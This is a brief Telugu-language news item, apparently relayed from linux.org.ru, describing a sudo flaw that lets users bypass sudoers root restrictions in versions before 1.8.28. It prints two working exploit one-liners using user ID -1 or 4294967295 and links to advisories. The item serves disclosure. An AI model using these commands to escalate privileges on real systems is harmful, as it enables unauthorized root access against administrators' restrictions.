sudoలోని బగ్ ఏదైనా ఎక్జిక్యూటబుల్ ఫైల్ను రూట్గా అమలు చేయడానికి మిమ్మల్ని అనుమతిస్తుంది, ఒకవేళ /etc/sudoers దానిని ఇతర వినియోగదారులచే అమలు చేయడానికి మరియు రూట్ కోసం నిషేధించబడితే.
లోపం యొక్క దోపిడీ చాలా సులభం:
sudo -u#-1 id -u
లేదా:
sudo -u#4294967295 id -u
1.8.28కి ముందు sudo యొక్క అన్ని వెర్షన్లలో ఎర్రర్ ఉంది
వివరాలు:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
మూలం: linux.org.ru